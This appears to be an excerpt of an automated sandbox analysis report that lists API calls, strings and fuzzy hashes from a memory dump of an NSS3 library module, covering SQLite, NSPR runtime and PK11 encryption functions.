                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$strlen
                                                                                                                  • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                  • API String ID: 2619041689-2155869073
                                                                                                                  APIs
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C828FEE
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8290DC
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C829118
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C82915C
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C8291C2
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C829209
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                  • String ID: 3333$UUUU
                                                                                                                  • API String ID: 1967222509-2679824526
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C6DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C73F9C9,?,6C73F4DA,6C73F9C9,?,?,6C70369A), ref: 6C6DCA7A
                                                                                                                    • Part of subcall function 6C6DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6DCB26
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C6E103E
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C6E1139
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C6E1190
                                                                                                                  • sqlite3_free.NSS3(00000000), ref: 6C6E1227
                                                                                                                  • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C6E126E
                                                                                                                  • sqlite3_free.NSS3(?), ref: 6C6E127F
                                                                                                                  Strings
                                                                                                                  • delayed %dms for lock/sharing conflict at line %d, xrefs: 6C6E1267
                                                                                                                  • winAccess, xrefs: 6C6E129B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                  • String ID: delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                  • API String ID: 2733752649-1873940834
                                                                                                                  APIs
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C80CF46,?,6C6DCDBD,?,6C80BF31,?,?,?,?,?,?,?), ref: 6C6EB039
                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C80CF46,?,6C6DCDBD,?,6C80BF31), ref: 6C6EB090
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,6C80CF46,?,6C6DCDBD,?,6C80BF31), ref: 6C6EB0A2
                                                                                                                  • CloseHandle.KERNEL32(?,?,6C80CF46,?,6C6DCDBD,?,6C80BF31,?,?,?,?,?,?,?,?,?), ref: 6C6EB100
                                                                                                                  • sqlite3_free.NSS3(?,?,00000002,?,6C80CF46,?,6C6DCDBD,?,6C80BF31,?,?,?,?,?,?,?), ref: 6C6EB115
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,6C80CF46,?,6C6DCDBD,?,6C80BF31), ref: 6C6EB12D
                                                                                                                    • Part of subcall function 6C6D9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C6EC6FD,?,?,?,?,6C73F965,00000000), ref: 6C6D9F0E
                                                                                                                    • Part of subcall function 6C6D9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C73F965,00000000), ref: 6C6D9F5D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3155957115-0
                                                                                                                  • Opcode ID: eef1fec3e8105ee5c9acd4f27e36e0577e51164344722409b58146487328f70c
                                                                                                                  • Instruction ID: 155413987713de3fd5090fcc820c7b755e4348292ade3b47ca4fc6c4ffd7a46e
                                                                                                                  • Opcode Fuzzy Hash: eef1fec3e8105ee5c9acd4f27e36e0577e51164344722409b58146487328f70c
                                                                                                                  • Instruction Fuzzy Hash: A291E4B0A093068FDB14CF64D884AAB77B1FF89308F14463EE41697B51EB30E441CB99
                                                                                                                  APIs
                                                                                                                  • PR_CallOnce.NSS3(6C8B14E4,6C81CC70), ref: 6C868D47
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C868D98
                                                                                                                    • Part of subcall function 6C740F00: PR_GetPageSize.NSS3(6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F1B
                                                                                                                    • Part of subcall function 6C740F00: PR_NewLogModule.NSS3(clock,6C740936,FFFFE8AE,?,6C6D16B7,00000000,?,6C740936,00000000,?,6C6D204A), ref: 6C740F25
                                                                                                                  • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C868E7B
                                                                                                                  • htons.WSOCK32(?), ref: 6C868EDB
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C868F99
                                                                                                                  • PR_GetCurrentThread.NSS3 ref: 6C86910A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                  • String ID: %u.%u.%u.%u
                                                                                                                  • API String ID: 1845059423-1542503432
                                                                                                                  • Opcode ID: 714048addc039756e4c6389056daa3d1c9ae424e6e5c155c0784d2dba842e209
                                                                                                                  • Instruction ID: 08644c907785201c5740e350e8c1bef3be6c7a7aea626ddcf67e271780d2f6ff
                                                                                                                  • Opcode Fuzzy Hash: 714048addc039756e4c6389056daa3d1c9ae424e6e5c155c0784d2dba842e209
                                                                                                                  • Instruction Fuzzy Hash: FE02B9319052558FDB348F1AC668766BBB2EF43304F298A9AC8955FFD1C339D945C390
                                                                                                                  APIs
                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C82C3A2,?,?,00000000,00000000), ref: 6C80A528
                                                                                                                  • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C80A6E0
                                                                                                                  • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C80A71B
                                                                                                                  • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C80A738
                                                                                                                  Strings
                                                                                                                  • database corruption, xrefs: 6C80A6D4
                                                                                                                  • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C80A6CA
                                                                                                                  • %s at line %d of [%.10s], xrefs: 6C80A6D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
                                                                                                                  • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                  • API String ID: 622669576-598938438
                                                                                                                  • Opcode ID: b5ab90feabac753c1f108c77a8355c2da9af0ba6c387dcca1ab963d451a5f092
                                                                                                                  • Instruction ID: d713232562ae5e65abe0be67015c7e304f08e7bf006390e6f725d1a4297e7ede
                                                                                                                  • Opcode Fuzzy Hash: b5ab90feabac753c1f108c77a8355c2da9af0ba6c387dcca1ab963d451a5f092
                                                                                                                  • Instruction Fuzzy Hash: 3B91F2717087018BC724CF69C980AAAB7F1BF49714F454E6DE8958BB91EB30EC44CB82
                                                                                                                  APIs
                                                                                                                  • PR_GetIdentitiesLayer.NSS3 ref: 6C7E68FC
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C7E6924
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190AB
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C8190C9
                                                                                                                    • Part of subcall function 6C819090: EnterCriticalSection.KERNEL32 ref: 6C8190E5
                                                                                                                    • Part of subcall function 6C819090: TlsGetValue.KERNEL32 ref: 6C819116
                                                                                                                    • Part of subcall function 6C819090: LeaveCriticalSection.KERNEL32 ref: 6C81913F
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407AD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407CD
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6D204A), ref: 6C7407D6
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6D204A), ref: 6C7407E4
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,6C6D204A), ref: 6C740864
                                                                                                                    • Part of subcall function 6C7407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C740880
                                                                                                                    • Part of subcall function 6C7407A0: TlsSetValue.KERNEL32(00000000,?,?,6C6D204A), ref: 6C7408CB
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408D7
                                                                                                                    • Part of subcall function 6C7407A0: TlsGetValue.KERNEL32(?,?,6C6D204A), ref: 6C7408FB
                                                                                                                  • PR_EnterMonitor.NSS3 ref: 6C7E693E
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E6977
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E69B8
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C7E6B1E
                                                                                                                  • PR_ExitMonitor.NSS3 ref: 6C7E6B39
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E6B62
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Value$Monitor$Enter$CriticalExitSectioncalloc$IdentitiesLayerLeave
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4003455268-0
                                                                                                                  • Opcode ID: 99d5b9ea69c0f383cdc30b35faa7192c79aacfc71af570cec0a994f91e512ba7
                                                                                                                  • Instruction ID: 0a897be3124d4f57e2c900c434ef431463832559fd75362ef02bf8f36a17347f
                                                                                                                  • Opcode Fuzzy Hash: 99d5b9ea69c0f383cdc30b35faa7192c79aacfc71af570cec0a994f91e512ba7
                                                                                                                  • Instruction Fuzzy Hash: 6E91B076658104CBCB90FF2DC68095E7BA2FB8B308B71C269C944CFA19D771DA41CB82
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E4571
                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000000), ref: 6C7E45B1
                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C7E45C2
                                                                                                                    • Part of subcall function 6C7E04C0: WaitForSingleObject.KERNEL32(ED850FC0,000000FF,?,00000000,?,6C7E461B,-00000004), ref: 6C7E04DF
                                                                                                                    • Part of subcall function 6C7E04C0: PR_SetError.NSS3(FFFFE89D,00000000,?,00000000,?,6C7E461B,-00000004), ref: 6C7E0534
                                                                                                                  • PR_Now.NSS3 ref: 6C7E4626
                                                                                                                    • Part of subcall function 6C819DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DC6
                                                                                                                    • Part of subcall function 6C819DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C860A27), ref: 6C819DD1
                                                                                                                    • Part of subcall function 6C819DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C819DED
                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C7E4634
                                                                                                                  • memcmp.VCRUNTIME140(?,?,?,00000000,?,000F4240,00000000), ref: 6C7E46C4
                                                                                                                  • PR_SetError.NSS3(FFFFD05A,00000000,00000000,?,000F4240,00000000), ref: 6C7E46E3
                                                                                                                  • PR_SetError.NSS3(?,00000000), ref: 6C7E4722
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorTime$SystemUnothrow_t@std@@@__ehfuncinfo$??2@$FileObjectSingleValueWaitmemcmpmemcpymemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1183590942-0
                                                                                                                  • Opcode ID: 3d2195fa0c809d06b22cf132c09367a5aa9da026d4071f18db57125427ce00fe
                                                                                                                  • Instruction ID: f53aee18bb1fcccb73fe04deb8f43f5c9d15ca82346958b1a5b169b15ae1e730
                                                                                                                  • Opcode Fuzzy Hash: 3d2195fa0c809d06b22cf132c09367a5aa9da026d4071f18db57125427ce00fe
                                                                                                                  • Instruction Fuzzy Hash: F461C1B2A006049FEB20CFA9D988B5AB7F1FF5D308F554939E8459BB51E730E905CB84
                                                                                                                  APIs
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?), ref: 6C764444
                                                                                                                  • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C764466
                                                                                                                    • Part of subcall function 6C7B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B1228
                                                                                                                    • Part of subcall function 6C7B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C7B1238
                                                                                                                    • Part of subcall function 6C7B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B124B
                                                                                                                    • Part of subcall function 6C7B1200: PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0,00000000,00000000,00000000,?,6C7588A4,00000000,00000000), ref: 6C7B125D
                                                                                                                    • Part of subcall function 6C7B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C7B126F
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C7B1280
                                                                                                                    • Part of subcall function 6C7B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C7B128E
                                                                                                                    • Part of subcall function 6C7B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C7B129A
                                                                                                                    • Part of subcall function 6C7B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C7B12A1
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C76447A
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C76448A
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C764494
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 241050562-0
                                                                                                                  • Opcode ID: e107f98d140548fb07046de3558faa0c64a971fd4bfeb8c076a6fcd71a84ccd8
                                                                                                                  • Instruction ID: 760768c34a9806364c5f1a1d92b9ac450a445904da6bdb6633c85746d69eda86
                                                                                                                  • Opcode Fuzzy Hash: e107f98d140548fb07046de3558faa0c64a971fd4bfeb8c076a6fcd71a84ccd8
                                                                                                                  • Instruction Fuzzy Hash: FC1151B2D007049BD720CF659D855A7B7B8FB59358B044B3EEC9952A00F371B5988791
                                                                                                                  APIs
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C86D086
                                                                                                                  • PR_Malloc.NSS3(00000001), ref: 6C86D0B9
                                                                                                                  • PR_Free.NSS3(?), ref: 6C86D138
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeMallocstrlen
                                                                                                                  • String ID: >
                                                                                                                  • API String ID: 1782319670-325317158
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C7C1052
                                                                                                                  • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C7C1086
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: h(|l$h(|l
                                                                                                                  • API String ID: 1297977491-1155293558
                                                                                                                  APIs
                                                                                                                  • memcpy.VCRUNTIME140(?,?,6C7C5A85), ref: 6C7E2675
                                                                                                                  • PK11_Encrypt.NSS3(?,00001081,00000000,?,?,00000010,?,00000010), ref: 6C7E2659
                                                                                                                    • Part of subcall function 6C793850: TlsGetValue.KERNEL32 ref: 6C79389F
                                                                                                                    • Part of subcall function 6C793850: EnterCriticalSection.KERNEL32(?), ref: 6C7938B3
                                                                                                                    • Part of subcall function 6C793850: PR_Unlock.NSS3(?), ref: 6C7938F1
                                                                                                                    • Part of subcall function 6C793850: TlsGetValue.KERNEL32 ref: 6C79390F
                                                                                                                    • Part of subcall function 6C793850: EnterCriticalSection.KERNEL32(?), ref: 6C793923
                                                                                                                    • Part of subcall function 6C793850: PR_Unlock.NSS3(?), ref: 6C793972
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7E2697
                                                                                                                  • PK11_Encrypt.NSS3(?,?,?,?,00000000,6C7C5A85,?,6C7C5A85), ref: 6C7E2717
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalEncryptEnterK11_SectionUnlockValue$Errormemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3114817199-0
                                                                                                                  APIs
                                                                                                                  • bind.WSOCK32(?,?,?,?,6C746401,?,?,0000001C), ref: 6C746422
                                                                                                                  • WSAGetLastError.WSOCK32(?,?,?,?,6C746401,?,?,0000001C), ref: 6C746432
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastbind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2328862993-0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$K11_$Alloc_ArenaArena_DoesFindMechanismTag_
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C6DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C73F9C9,?,6C73F4DA,6C73F9C9,?,?,6C70369A), ref: 6C6DCA7A
                                                                                                                    • Part of subcall function 6C6DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C6DCB26
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,?,?,6C6EBE66), ref: 6C826E81
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C6EBE66), ref: 6C826E98
                                                                                                                  • sqlite3_snprintf.NSS3(?,00000000,6C88AAF9,?,?,?,?,?,?,6C6EBE66), ref: 6C826EC9
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C6EBE66), ref: 6C826ED2
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C6EBE66), ref: 6C826EF8
                                                                                                                  • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826F1F
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826F28
                                                                                                                  • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826F3D
                                                                                                                  • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C6EBE66), ref: 6C826FA6
                                                                                                                  • sqlite3_snprintf.NSS3(?,00000000,6C88AAF9,00000000,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826FDB
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826FE4
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C826FEF
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C827014
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,6C6EBE66), ref: 6C82701D
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C6EBE66), ref: 6C827030
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C6EBE66), ref: 6C82705B
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C6EBE66), ref: 6C827079
                                                                                                                  • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C827097
                                                                                                                  • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C6EBE66), ref: 6C8270A0
                                                                                                                  Similarity
                                                                                                                  • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                                  • String ID: mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                                  APIs
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7675C2,00000000,00000000,00000001), ref: 6C7B5009
                                                                                                                  • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7675C2,00000000), ref: 6C7B5049
                                                                                                                  • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7B505D
                                                                                                                  • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C7B5071
                                                                                                                  • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B5089
                                                                                                                  • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B50A1
                                                                                                                  • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C7B50B2
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C7675C2), ref: 6C7B50CB
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7B50D9
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7B50F5
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B5103
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B511D
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B512B
                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B5145
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7B5153
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B516D
                                                                                                                  • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C7B517B
                                                                                                                  • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7B5195
                                                                                                                  Similarity
                                                                                                                  • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                                  • String ID: config=$library=$name=$nss=$parameters=
                                                                                                                  APIs
                                                                                                                  • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4C50
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4C5B
                                                                                                                  • PR_smprintf.NSS3(6C88AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4C76
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4CAE
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4CC9
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4CF4
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C7B4D0B
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4D5E
                                                                                                                  • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C7A4F51,00000000), ref: 6C7B4D68
                                                                                                                  • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C7B4D85
                                                                                                                  • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C7B4DA2
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B4DB9
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7B4DCF
